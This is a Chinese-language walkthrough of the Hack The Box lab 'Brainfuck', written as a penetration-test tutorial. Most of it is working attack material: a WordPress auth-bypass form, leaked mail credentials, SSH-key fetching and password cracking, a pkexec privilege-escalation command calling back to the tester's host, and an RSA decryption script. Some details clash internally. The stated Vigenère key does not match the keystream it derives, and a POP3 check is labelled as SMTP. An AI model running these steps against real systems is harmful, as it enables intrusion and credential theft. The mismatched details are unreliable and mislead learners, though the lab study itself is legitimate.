Brainfuck WordPress Ticket System 渗透测试教学文档

1. 信息收集阶段

1.1 目标识别

• IP地址: 10.10.10.17
• 域名:
  • brainfuck.htb
  • www.brainfuck.htb
  • sup3rs3cr3t.brainfuck.htb

1.2 端口扫描

使用Nmap进行扫描:

nmap -p- 10.10.10.17 --min-rate 1000 -sC -sV

开放端口及服务:

• 22/tcp: OpenSSH 7.2p2 Ubuntu
• 25/tcp: Postfix smtpd
• 110/tcp: Dovecot pop3d
• 143/tcp: Dovecot imapd
• 443/tcp: nginx 1.10.0 (Ubuntu) + SSL

1.3 网站识别

• WordPress系统
• 子域名: https://sup3rs3cr3t.brainfuck.htb/

2. 漏洞利用

2.1 WordPress任意用户登录漏洞

利用wp_set_auth_cookie()的错误实现，可以以任何用户身份登录而不知道密码。

利用方法:

<form method="post" action="https://brainfuck.htb/wp-admin/admin-ajax.php">
    Username: <input type="text" name="username" value="admin">
    <input type="hidden" name="email" value="sth">
    <input type="hidden" name="action" value="loginGuestFacebook">
    <input type="submit" value="Login">
</form>

2.2 SMTP凭据泄露

在WordPress后台找到SMTP设置页面泄露了凭据:

• 路径: https://brainfuck.htb/wp-admin/options-general.php?page=swpsmtp_settings
• 用户名: orestis
• 密码: kHGuERB29DNiNE

验证SMTP凭据:

telnet 10.10.10.17 110
USER orestis
PASS kHGuERB29DNiNE
list
RETR 2

从邮件中获取到新的凭据:

• 用户名: orestis
• 密码: kIEnnfEKJ#9UmdO

3. 密码学分析

3.1 维吉尼亚密码分析

Orestis的帖子结尾格式为"xxxxxxx - xxxxxxx xxx xxx xxx xxxxxx"，与"Orestis - Hacking for fun and profit"结构相同。

解密过程:

1. 已知密文: "Pieagnm - Jkoijeg nbw zwx mle grwsnn"
2. 已知明文: "Orestis - Hacking for fun and profit"
3. 计算密钥:

enc = "Pieagnm - Jkoijeg nbw zwx mle grwsnn"
pt = "Orestis - Hacking for fun and profit"
[(ord(e)-ord(p))%26 + ord('a') for e,p in zip(enc, pt)]

得到密钥: "brainfuckmybrainfuckmybrainfuckmybrain"

实际使用密钥: "brainfuck"

3.2 解密其他信息

使用密钥"brainfuck"解密其他密文:

• 密文: "Ufgoqcbje....Wejmvse - Fbtkqal zqb rso rnl cwihsf"
• 解密后得到URL: https://brainfuck.htb/8ba5aa10e915218697d1c658cdee0bb8/orestis/id_rsa

4. SSH访问

4.1 获取SSH私钥

curl https://brainfuck.htb/8ba5aa10e915218697d1c658cdee0bb8/orestis/id_rsa -k -o id_rsa

4.2 破解SSH私钥密码

1. 使用ssh2john转换私钥:

ssh2john id_rsa > id_rsa.john

2. 使用John the Ripper破解:

john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.john

得到密码: "3poulakia!"

3. 解密私钥:

openssl rsa -in id_rsa -out id_rsa_dec

4.3 SSH登录

ssh -i ./id_rsa_dec orestis@10.10.10.17

获取user flag:

2c11cfbc5b959f73ac15a3310bd097c9

5. 权限提升

5.1 使用TRP00F工具提权

python3 trp00f.py --lhost 10.10.16.24 --lport 10031 --rhost 10.10.16.24 --rport 10032 --http 10033

选择利用pkexec漏洞(y)

5.2 RSA解密挑战

在debug.txt和output.txt中找到RSA参数:

参数:

P = 7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307
Q = 7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079
E = 30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997
ct = 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182

解密脚本:

def egcd(a, b):
    x,y, u,v = 0,1, 1,0
    while a != 0:
        q, r = b//a, b%a
        m, n = x-u*q, y-v*q
        b,a, x,y, u,v = a,r, u,v, m,n
    gcd = b
    return gcd, x, y

def main():
    p = 7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307
    q = 7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079
    e = 30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997
    ct = 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182

    # compute n
    n = p * q
    
    # Compute phi(n)
    phi = (p - 1) * (q - 1)
    
    # Compute modular inverse of e
    gcd, a, b = egcd(e, phi)
    d = a
    
    # Decrypt ciphertext
    pt = pow(ct, d, n)
    print("Plaintext:", pt)
    print("Hex:", hex(pt)[2:])
    print("ASCII:", bytearray.fromhex(hex(pt)[2:]).decode())

if __name__ == "__main__":
    main()

解密结果:

24604052029401386049980296953784287079059245867880966944246662849341507003750

转换为ASCII:

python -c "print format(24604052029401386049980296953784287079059245867880966944246662849341507003750, 'x').decode('hex')"

6. 总结

本次渗透测试涉及多个关键步骤和技术:

1. WordPress任意用户登录漏洞利用
2. SMTP凭据泄露和邮件信息提取
3. 维吉尼亚密码分析和解密
4. SSH私钥获取和密码破解
5. RSA参数提取和密文解密
6. 权限提升技术

每个阶段都展示了不同的安全技术和分析方法，形成了完整的渗透测试流程。